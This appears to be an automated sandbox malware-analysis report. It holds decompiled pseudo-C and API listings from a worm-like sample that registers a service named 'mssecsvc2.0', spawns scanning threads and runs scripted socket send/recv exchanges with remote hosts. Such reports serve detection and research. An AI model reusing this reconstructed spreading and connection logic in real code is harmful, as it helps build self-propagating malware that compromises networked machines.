							memcpy(_t70, _t82, _t53 << 2);
							_t30 = memcpy(_t82 + _t53 + _t53, _t82, _t52 & 0x00000003);
							_t88 =  &(_t88[6]);
							 *(_t88 + 0x10 + _t66 * 4) =  *(_t88 + 0x10 + _t66 * 4) + _t30;
							_t66 = _t66 + 1;
						} while (_t66 < 2);
						_t51 = CreateFileA(0x70f760, 0x80000000, 1, 0, 3, 4, 0);
						if(_t51 != 0xffffffff) {
							_t32 = GetFileSize(_t51, 0);
							_t85 = _v8;
							_t75 = _t32;
							_t18 = _t85 + 4; // 0x50d804
							 *_t85 = _t75;
							ReadFile(_t51, _t18, _t75,  &_v12, 0);
							if(_v12 == _t75) {
								_t20 = _t75 + 4; // 0x4
								_t59 = _t20;
								_t60 = _t59 >> 2;
								memcpy(_v4, _t85, _t60 << 2);
								memcpy(_t85 + _t60 + _t60, _t85, _t59 & 0x00000003);
								CloseHandle(_t51);
								return 1;
							} else {
								CloseHandle(_t51);
								GlobalFree( *0x70f864);
								GlobalFree( *0x70f868);
								return 0;
							}
						} else {
							GlobalFree( *0x70f864);
							GlobalFree( *0x70f868);
							return 0;
						}
					} else {
						GlobalFree( *0x70f864);
						return 0;
					}
				} else {
					return _t23;
				}
			}





















            0x00407a20
            0x00407a33
            0x00407a3b
            0x00407a43
            0x00407a4b
            0x00407a4f
            0x00407a54
            0x00407a64
            0x00407a68
            0x00407a6d
            0x00407a84
            0x00407a86
            0x00407a88
            0x00407a8d
            0x00407a8f
            0x00407a8f
            0x00407a96
            0x00407a9f
            0x00407aa1
            0x00407aaf
            0x00407ab3
            0x00407ab6
            0x00407abd
            0x00407abd
            0x00407ac5
            0x00407ac9
            0x00407aca
            0x00407ae9
            0x00407aee
            0x00407b14
            0x00407b1a
            0x00407b1e
            0x00407b27
            0x00407b2d
            0x00407b2f
            0x00407b39
            0x00407b62
            0x00407b62
            0x00407b6c
            0x00407b6f
            0x00407b76
            0x00407b78
            0x00407b89
            0x00407b3b
            0x00407b3c
            0x00407b4f
            0x00407b57
            0x00407b61
            0x00407b61
            0x00407af0
            0x00407afd
            0x00407b06
            0x00407b10
            0x00407b10
            0x00407a6f
            0x00407a75
            0x00407a83
            0x00407a83
            0x00407a5c
            0x00407a5c
            0x00407a5c

            APIs
            • GlobalAlloc.KERNEL32 ref: 00407A4B
            • GlobalAlloc.KERNEL32(00000040,0050D800), ref: 00407A64
            • GlobalFree.KERNEL32 ref: 00407A75
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Global$Alloc$Free
            • String ID:
            • API String ID: 3737745340-0
            • Opcode ID: 0f0e7c931b87fc0c2fb90eaf141c425682db977e2a12490b894685d9a79f56af
            • Instruction ID: 576d902bf6cbb8a03d702eeef5b9d6f129e333ca1616e06ca5f7e1a84b8310db
            • Opcode Fuzzy Hash: 0f0e7c931b87fc0c2fb90eaf141c425682db977e2a12490b894685d9a79f56af
            • Instruction Fuzzy Hash: 7F418F72B003149BD710DF25AD45B9B37E5FBC8720F54853AEA05E32C0D67DA918CBAA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401660 Relevance: 15.1, APIs: 10, Instructions: 118sleepCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 314 401660-40169e call 409960 call 4098a0 319 4016a0-4016ca Sleep 314->319 320 4016cb-4016dc 314->320 321 40171c-401763 _ftol QueryPerformanceCounter 320->321 322 4016de-4016eb QueryPerformanceFrequency 320->322 323 401765-401766 Sleep 321->323 324 40176c-40177f QueryPerformanceCounter 321->324 325 40170c-401716 322->325 326 4016ed-40170b Sleep 322->326 323->324 327 401781 324->327 328 4017a4-4017aa 324->328 325->321 329 401783-401789 327->329 330 40178b-401798 QueryPerformanceCounter 327->330 329->328 329->330 330->330 331 40179a 330->331 331->328 332 40179c-4017a2 331->332 332->328 332->330
            C-Code - Quality: 89%
            			E00401660(union _LARGE_INTEGER _a4, intOrPtr _a8) {
				union _LARGE_INTEGER _v8;
				intOrPtr _v12;
				union _LARGE_INTEGER _v16;
				signed int _v28;
				long _t49;
				intOrPtr _t56;
				signed int _t66;
				long _t68;
				intOrPtr _t77;
				long _t84;
				signed int _t89;
				void* _t91;
				signed int _t94;
				intOrPtr _t95;
				long long _t102;

				_t89 = E00409960(_a4.LowPart, _a8, 0xf4240, 0);
				_t49 = E004098A0(_a4.LowPart, _a8, 0xf4240, 0) + _t47 * 4 + (E004098A0(_a4.LowPart, _a8, 0xf4240, 0) + _t47 * 4) * 4;
				_t94 = _t49 + _t49 * 4 << 3;
				_v28 = _t94;
				if(_t89 <= 0) {
					_t102 =  *0x431450;
					asm("fcomp qword [0x40a188]");
					asm("fnstsw ax");
					__eflags = _t49 & 0x00000040;
					if((_t49 & 0x00000040) == 0) {
						L6:
						asm("fild dword [esp+0x20]");
						L00409890();
						_a8 = _t77;
						_t68 = (0x431bde83 * _t94 >> 0x20 >> 0x12) + (0x431bde83 * _t94 >> 0x20 >> 0x12 >> 0x1f) - 0xa;
						QueryPerformanceCounter( &_v16);
						_t95 = _v12;
						_t91 = _v16.LowPart + _t49;
						asm("adc esi, ecx");
						__eflags = _t68;
						if(_t68 > 0) {
							Sleep(_t68);
						}
						QueryPerformanceCounter( &_a4);
						_t56 = _a8;
						__eflags = _t56 - _t95;
						if(__eflags <= 0) {
							if(__eflags < 0) {
								L11:
								QueryPerformanceCounter( &_a4);
								_t56 = _a8;
								__eflags = _t56 - _t95;
							} else {
								__eflags = _a4.LowPart - _t91;
								if(_a4.LowPart < _t91) {
									goto L11;
									do {
										do {
											goto L11;
										} while (__eflags < 0);
										if(__eflags <= 0) {
											goto L13;
										}
										goto L14;
										L13:
										__eflags = _a4.LowPart - _t91;
									} while (_a4.LowPart < _t91);
								}
							}
						}
						L14:
						return _t56;
					} else {
						_t49 = QueryPerformanceFrequency( &_v8);
						__eflags = _t49;
						if(_t49 != 0) {
							asm("fild qword [esp+0x14]");
							 *0x431450 = _t102;
							goto L6;
						} else {
							_t84 = (0x431bde83 * _t94 >> 0x20 >> 0x12) + (0x431bde83 * _t94 >> 0x20 >> 0x12 >> 0x1f);
							__eflags = _t84;
							Sleep(_t84);
							return 0x431bde83 * _t94;
						}
					}
				} else {
					_t66 = _t89 + _t89 * 4 + (_t89 + _t89 * 4) * 4;
					Sleep((0x431bde83 * _t94 >> 0x20 >> 0x12) + (0x431bde83 * _t94 >> 0x20 >> 0x12 >> 0x1f) + (_t66 + _t66 * 4) * 8);
					return _t66;
				}
			}


















            0x00401685
            0x0040168f
            0x00401695
            0x0040169a
            0x0040169e
            0x004016cb
            0x004016d1
            0x004016d7
            0x004016d9
            0x004016dc
            0x0040171c
            0x0040171c
            0x00401727
            0x00401733
            0x00401746
            0x0040174a
            0x00401754
            0x0040175c
            0x0040175e
            0x00401761
            0x00401763
            0x00401766
            0x00401766
            0x00401777
            0x00401779
            0x0040177d
            0x0040177f
            0x00401781
            0x0040178b
            0x00401790
            0x00401792
            0x00401796
            0x00401783
            0x00401787
            0x00401789
            0x00000000
            0x0040178b
            0x0040178b
            0x00000000
            0x00000000
            0x0040179a
            0x00000000
            0x00000000
            0x00000000
            0x0040179c
            0x004017a0
            0x004017a0
            0x0040178b
            0x00401789
            0x00401781
            0x004017aa
            0x004017aa
            0x004016de
            0x004016e3
            0x004016e9
            0x004016eb
            0x0040170c
            0x00401716
            0x00000000
            0x004016ed
            0x004016fc
            0x004016fc
            0x004016ff
            0x0040170b
            0x0040170b
            0x004016eb
            0x004016a0
            0x004016b4
            0x004016be
            0x004016ca
            0x004016ca

            APIs
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00401677
            • __allrem.LIBCMT ref: 00401687
            • Sleep.KERNEL32(?,?,?,000F4240,00000000,?,?,000F4240,00000000,?,00431480,00000000), ref: 004016BE
            • QueryPerformanceFrequency.KERNEL32(000F4240,?,?,000F4240,00000000,?,?,000F4240,00000000,?,00431480,00000000), ref: 004016E3
            • Sleep.KERNEL32(?,?,00431480,00000000), ref: 004016FF
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Sleep$FrequencyPerformanceQueryUnothrow_t@std@@@__allrem__ehfuncinfo$??2@
            • String ID:
            • API String ID: 1865988196-0
            • Opcode ID: 5e4d94bea77e2ed6b07bd592e4679988c21404304d6631d8ddc961a09a62db50
            • Instruction ID: ca8a84c6aee2b709c623a849754ad144badd5e8b4fc1d996b6a0b75b13124809
            • Opcode Fuzzy Hash: 5e4d94bea77e2ed6b07bd592e4679988c21404304d6631d8ddc961a09a62db50
            • Instruction Fuzzy Hash: 0731D4362003058BC310DF19DD859AA77A9FFC4304F84092EF585BB2A2D739E918C799
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00407720 Relevance: 9.1, APIs: 6, Instructions: 91sleepCOMMON
            Download Yara Rule
            C-Code - Quality: 58%
            			E00407720() {
				char _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v45;
				intOrPtr _t30;
				void* _t32;
				signed int _t51;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				intOrPtr _t61;
				void* _t63;

				_push(0xffffffff);
				_push(E00409BC0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t61;
				_t54 = 0;
				_v28 = _v45;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v4 = 0;
				_v44 = _v45;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_push( &_v44);
				_push( &_v28);
				_v4 = 1;
				E00409160();
				_t59 = __imp___beginthreadex;
				_t63 = _t61 - 0x24 + 8;
				_t51 = 0;
				while(1) {
					_t30 = _v24;
					if(_t30 == _t54 || _t51 >= _v20 - _t30 >> 2) {
						break;
					}
					if( *0x70f86c > 0xa) {
						do {
							Sleep(0x64);
						} while ( *0x70f86c > 0xa);
						_t30 = _v24;
					}
					_t57 =  *_t59(0, 0, E004076B0,  *((intOrPtr*)(_t30 + _t51 * 4)), 0, 0);
					_t63 = _t63 + 0x18;
					if(_t57 != 0) {
						InterlockedIncrement(0x70f86c);
						CloseHandle(_t57);
					}
					Sleep(0x32);
					_t51 = _t51 + 1;
					_t54 = 0;
				}
				__imp___endthreadex(_t54);
				_t32 = E004097FE(_v40, _v40);
				_v40 = _t54;
				_v36 = _t54;
				_v32 = _t54;
				E004097FE(_t32, _v24);
				 *[fs:0x0] = _v12;
				return 0;
			}






















            0x00407720
            0x00407722
            0x0040772d
            0x0040772e
            0x0040773f
            0x00407742
            0x00407746
            0x0040774a
            0x0040774e
            0x00407756
            0x0040775a
            0x0040775e
            0x00407762
            0x00407766
            0x00407772
            0x00407773
            0x00407774
            0x00407779
            0x00407784
            0x0040778a
            0x0040778d
            0x0040778f
            0x0040778f
            0x00407795
            0x00000000
            0x00000000
            0x004077b1
            0x004077b3
            0x004077b5
            0x004077b7
            0x004077bf
            0x004077bf
            0x004077d6
            0x004077d8
            0x004077dd
            0x004077e4
            0x004077eb
            0x004077eb
            0x004077f3
            0x004077f5
            0x004077f6
            0x004077f6
            0x004077fb
            0x00407806
            0x0040780f
            0x00407814
            0x00407818
            0x0040781c
            0x0040782a
            0x00407838

            APIs
              • Part of subcall function 00409160: GetAdaptersInfo.IPHLPAPI ref: 00409173
              • Part of subcall function 00409160: LocalAlloc.KERNEL32(00000000,00000000,00000000,?), ref: 00409188
              • Part of subcall function 00409160: GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0040919E
              • Part of subcall function 00409160: LocalFree.KERNEL32(00000000,00000000,?), ref: 004091A8
            • Sleep.KERNEL32(00000064), ref: 004077B5
            • _beginthreadex.MSVCRT ref: 004077D4
            • InterlockedIncrement.KERNEL32(0070F86C), ref: 004077E4
            • CloseHandle.KERNEL32(00000000), ref: 004077EB
            • Sleep.KERNEL32(00000032), ref: 004077F3
            • _endthreadex.MSVCRT(00000000), ref: 004077FB
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: AdaptersInfoLocalSleep$AllocCloseFreeHandleIncrementInterlocked_beginthreadex_endthreadex
            • String ID:
            • API String ID: 3699243544-0
            • Opcode ID: e9713544c1ab7fc6fe7d11ad933d691a78c98f2c71b545826b9e0ee993b31d38
            • Instruction ID: 036364e59514726501199075794a4ec7e741377dc520afbe60009fae6dc53544
            • Opcode Fuzzy Hash: e9713544c1ab7fc6fe7d11ad933d691a78c98f2c71b545826b9e0ee993b31d38
            • Instruction Fuzzy Hash: 4731C6759083509FC310DF29DD41B1FBBE4EB89B14F044A2EF589A7391C678A905CB9B
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00407540 Relevance: 9.1, APIs: 6, Instructions: 70sleepstringCOMMON
            Download Yara Rule
            APIs
            • inet_ntoa.WS2_32(?), ref: 00407567
            • strncpy.MSVCRT ref: 00407572
              • Part of subcall function 00401980: inet_addr.WS2_32(?), ref: 004019AC
              • Part of subcall function 00401980: htons.WS2_32(?), ref: 004019BD
              • Part of subcall function 00401980: socket.WS2_32(00000002,00000001,00000000), ref: 004019CD
              • Part of subcall function 00401980: connect.WS2_32(00000000,00000002,00000010), ref: 004019E5
              • Part of subcall function 00401980: send.WS2_32(00000000,0042E3D0,00000058,00000000), ref: 004019FD
              • Part of subcall function 00401980: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A18
              • Part of subcall function 00401980: send.WS2_32(00000000,0042E42C,00000067,00000000), ref: 00401A30
              • Part of subcall function 00401980: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A4B
              • Part of subcall function 00401980: send.WS2_32(00000000,0042E494,00000000,00000000), ref: 00401A80
              • Part of subcall function 00401980: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A9B
            • Sleep.KERNEL32(00000BB8), ref: 004075BA
              • Part of subcall function 00401370: GetTickCount.KERNEL32 ref: 00401398
              • Part of subcall function 00401370: GetTickCount.KERNEL32 ref: 004013DC
              • Part of subcall function 00401370: _ftol.MSVCRT ref: 00401405
              • Part of subcall function 00401370: GetTickCount.KERNEL32 ref: 00401418
              • Part of subcall function 00401370: inet_addr.WS2_32(?), ref: 00401440
              • Part of subcall function 00401370: htons.WS2_32(?), ref: 00401451
              • Part of subcall function 00401370: socket.WS2_32(00000002,00000001,00000000), ref: 00401460
              • Part of subcall function 00401370: connect.WS2_32(00000000,?,00000010), ref: 00401478
            • Sleep.KERNEL32(00000BB8), ref: 0040759B
              • Part of subcall function 00401B70: inet_addr.WS2_32(?), ref: 00401B9D
              • Part of subcall function 00401B70: htons.WS2_32(?), ref: 00401BAE
              • Part of subcall function 00401B70: socket.WS2_32(00000002,00000001,00000000), ref: 00401BBE
              • Part of subcall function 00401B70: connect.WS2_32(00000000,00000002,00000010), ref: 00401BD6
              • Part of subcall function 00401B70: send.WS2_32(00000000,0042E544,00000089,00000000), ref: 00401BF1
              • Part of subcall function 00401B70: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C0C
              • Part of subcall function 00401B70: send.WS2_32(00000000,0042E5D0,0000008C,00000000), ref: 00401C27
              • Part of subcall function 00401B70: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C42
              • Part of subcall function 00401B70: send.WS2_32(00000000,0042E65C,00000060,00000000), ref: 00401C72
              • Part of subcall function 00401B70: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C8D
              • Part of subcall function 00401B70: send.WS2_32(00000000,0042E6BC,00000052,00000000), ref: 00401CC8
            • Sleep.KERNEL32(00000BB8), ref: 004075D9
            • _endthreadex.MSVCRT(00000000), ref: 0040760B
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: send$recv$CountSleepTickconnecthtonsinet_addrsocket$_endthreadex_ftolinet_ntoastrncpy
            • String ID:
            • API String ID: 3594311545-0
            • Opcode ID: 53e20c35e8333db68bbe0d6d434447a6f3ba3a4c8f9bcdcfdda5b572d599166e
            • Instruction ID: d1f80762ba9c9f89635f6fb1f00430b81cd891b600365ae937814c44faefcc85
            • Opcode Fuzzy Hash: 53e20c35e8333db68bbe0d6d434447a6f3ba3a4c8f9bcdcfdda5b572d599166e
            • Instruction Fuzzy Hash: B511B675A4430076E224A665EC46FDB77989B84B58F00483AFA48AA1C2FBB9E504C657
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00407480 Relevance: 9.1, APIs: 6, Instructions: 58networkCOMMON
            Download Yara Rule
            APIs
            • htons.WS2_32 ref: 004074BB
            • socket.WS2_32(00000002,00000001,00000006), ref: 004074CA
            • ioctlsocket.WS2_32(00000000,8004667E,00000002), ref: 004074EC
            • connect.WS2_32 ref: 0040750D
            • select.WS2_32(00000000,00000000,00000000,00000000,00000010), ref: 00407522
            • closesocket.WS2_32(00000000), ref: 0040752A
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: closesocketconnecthtonsioctlsocketselectsocket
            • String ID:
            • API String ID: 3058043877-0
            • Opcode ID: 74fe2f28b16612d5f26350b6b98a18066fac73a67988351cfe484f1d366771bc
            • Instruction ID: 6df9e8ee6f8bbc7b72ca5fe7a016eded16036e18dc5b6cdd076988aaf91788ea
            • Opcode Fuzzy Hash: 74fe2f28b16612d5f26350b6b98a18066fac73a67988351cfe484f1d366771bc
            • Instruction Fuzzy Hash: 5D119471528310AEE310DF69D842B9FF6E8AFC8714F00492FF194A72D1E3B49908879B
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004076B0 Relevance: 9.0, APIs: 6, Instructions: 36synchronizationthreadCOMMON
            Download Yara Rule
            C-Code - Quality: 64%
            			E004076B0(short _a4) {
				void* _t2;
				short _t8;
				void* _t9;
				void* _t10;
				void* _t11;

				_t8 = _a4;
				_t2 = E00407480(_t8);
				_t11 = _t10 + 4;
				if(_t2 > 0) {
					__imp___beginthreadex(0, 0, E00407540, _t8, 0, 0);
					_t9 = _t2;
					_t11 = _t11 + 0x18;
					if(_t9 != 0) {
						if(WaitForSingleObject(_t9, 0x927c0) == 0x102) {
							TerminateThread(_t9, 0);
						}
						CloseHandle(_t9);
					}
				}
				InterlockedDecrement(0x70f86c);
				__imp___endthreadex(0);
				return 0;
			}








            0x004076b1
            0x004076b6
            0x004076bb
            0x004076c0
            0x004076d0
            0x004076d6
            0x004076d8
            0x004076dd
            0x004076f0
            0x004076f5
            0x004076f5
            0x004076fc
            0x004076fc
            0x004076dd
            0x00407707
            0x0040770f
            0x0040771b

            APIs
              • Part of subcall function 00407480: htons.WS2_32 ref: 004074BB
              • Part of subcall function 00407480: socket.WS2_32(00000002,00000001,00000006), ref: 004074CA
            • _beginthreadex.MSVCRT ref: 004076D0
            • WaitForSingleObject.KERNEL32(00000000,000927C0), ref: 004076E5
            • TerminateThread.KERNEL32(00000000,00000000), ref: 004076F5
            • CloseHandle.KERNEL32(00000000), ref: 004076FC
            • InterlockedDecrement.KERNEL32(0070F86C), ref: 00407707
            • _endthreadex.MSVCRT(00000000), ref: 0040770F
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: CloseDecrementHandleInterlockedObjectSingleTerminateThreadWait_beginthreadex_endthreadexhtonssocket
            • String ID:
            • API String ID: 407422849-0
            • Opcode ID: 60287ac1eaa836bf61f37fd8f94dddd160bc0bca6729292d4e387edf32552774
            • Instruction ID: a6e8c1f1202328c55156defa0251d0554e33502934f8847b01033206933adfeb
            • Opcode Fuzzy Hash: 60287ac1eaa836bf61f37fd8f94dddd160bc0bca6729292d4e387edf32552774
            • Instruction Fuzzy Hash: 5DF05E72E89720B7E2212BA06E0FF8F3654AF05B51F104031FA05F52D2D6B9795146EF
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepregistryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00408000() {
				int _t1;

				 *0x431430 = 0x20;
				 *0x431434 = 2;
				 *0x431438 = 1;
				 *0x43143c = 0;
				 *0x431440 = 0;
				 *0x431444 = 0;
				 *0x431448 = 0;
				_t1 = RegisterServiceCtrlHandlerA("mssecsvc2.0", E00407F30);
				 *0x43145c = _t1;
				if(_t1 != 0) {
					 *0x431434 = 4;
					 *0x431444 = 0;
					 *0x431448 = 0;
					SetServiceStatus(_t1, 0x431430);
					_t1 = E00407BD0();
					Sleep(0x5265c00);
					ExitProcess(1);
				}
				return _t1;
			}




            0x0040800d
            0x00408017
            0x00408021
            0x0040802b
            0x00408031
            0x00408037
            0x0040803d
            0x00408043
            0x0040804b
            0x00408050
            0x00408058
            0x00408062
            0x00408068
            0x0040806e
            0x00408074
            0x0040807e
            0x00408086
            0x00408086
            0x0040808d

            APIs
            • RegisterServiceCtrlHandlerA.ADVAPI32(mssecsvc2.0,Function_00007F30), ref: 00408043
            • SetServiceStatus.ADVAPI32(00000000,00431430), ref: 0040806E
            • Sleep.KERNEL32(05265C00), ref: 0040807E
            • ExitProcess.KERNEL32 ref: 00408086
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Service$CtrlExitHandlerProcessRegisterSleepStatus
            • String ID: mssecsvc2.0
            • API String ID: 593436849-3729025388
            • Opcode ID: ab14e928c5aa1631dd6b16fff744ede782dd457d01c3138f0d9857494a232c93
            • Instruction ID: 2550cb99b99e40fc171e375658fe6756ce05338598ec0956c15b43d584f71d0c
            • Opcode Fuzzy Hash: ab14e928c5aa1631dd6b16fff744ede782dd457d01c3138f0d9857494a232c93
            • Instruction Fuzzy Hash: 18F0B7B0511324DBD3109F54FE49B893EA8B724B09F64653BF144A72B1CBB91468CFAE
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00407BD0 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
            Download Yara Rule
            C-Code - Quality: 58%
            			E00407BD0() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t7;
				void* _t10;
				intOrPtr* _t11;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t19;
				void* _t20;

				_t1 = E00407B90();
				if(_t1 != 0) {
					_t11 = __imp___beginthreadex;
					_t2 =  *_t11(0, 0, E00407720, 0, 0, 0, _t10, _t13, _t16, _t7);
					_t20 = _t19 + 0x18;
					if(_t2 != 0) {
						CloseHandle(_t2);
					}
					_t14 = 0;
					do {
						_t3 =  *_t11(0, 0, E00407840, _t14, 0, 0);
						_t20 = _t20 + 0x18;
						if(_t3 != 0) {
							CloseHandle(_t3);
						}
						Sleep(0x7d0);
						_t14 = _t14 + 1;
					} while (_t14 < 0x80);
					return 0;
				} else {
					return _t1;
				}
			}














            0x00407bd0
            0x00407bd7
            0x00407bde
            0x00407bf3
            0x00407bfb
            0x00407c00
            0x00407c03
            0x00407c03
            0x00407c0b
            0x00407c0d
            0x00407c1b
            0x00407c1d
            0x00407c22
            0x00407c25
            0x00407c25
            0x00407c2c
            0x00407c2e
            0x00407c2f
            0x00407c3d
            0x00407bd9
            0x00407bd9
            0x00407bd9

            APIs
              • Part of subcall function 00407B90: WSAStartup.WS2_32(00000202), ref: 00407BA0
            • _beginthreadex.MSVCRT ref: 00407BF3
            • CloseHandle.KERNEL32(00000000), ref: 00407C03
            • _beginthreadex.MSVCRT ref: 00407C1B
            • CloseHandle.KERNEL32(00000000), ref: 00407C25
            • Sleep.KERNEL32(000007D0), ref: 00407C2C
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
